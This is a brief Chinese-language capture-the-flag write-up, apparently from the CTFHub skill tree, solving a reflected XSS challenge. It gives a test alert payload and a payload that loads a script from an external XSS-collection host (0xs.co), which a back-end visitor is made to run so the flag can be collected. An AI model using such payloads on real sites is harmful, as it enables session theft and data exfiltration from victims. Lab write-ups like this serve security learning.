反射型XSS

查看頁面：

XSS_Reflex1

第一個輸入框與下面Hello后的內容相同，猜測可以通過該輸入，改變頁面內容。

進行測試：

<script>alert(1)</script>

XSS_Reflex2

默認使用get方式發送Payload，成功彈窗。

經過測試，第二個輸入框輸入URL時，返回SUCCESS，猜測在后台進行訪問。

嘗試使用XSS Platform，在第一個框中輸入包含腳本網址：<script src=//0xs.co/YGlQP></script>。

通過第二個框，訪問包含了XSS腳本的本頁面URL：

XSS_Reflex3

於平台獲得FLAG。

XSS_Reflex4

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CTFHUB-技能樹-Web-XSS-反射型 ctfhub技能樹—sql注入—字符型注入 ctfhub技能樹—sql注入—整數型注入 ctfhub技能樹—彩蛋 CTFHub Web技能樹 CTFHub-技能樹-SSRF CTFHub技能樹-目錄遍歷 CTFHub-Web技能樹 CTFHub web技能樹 RCE CTFHUB技能樹學習之SSRF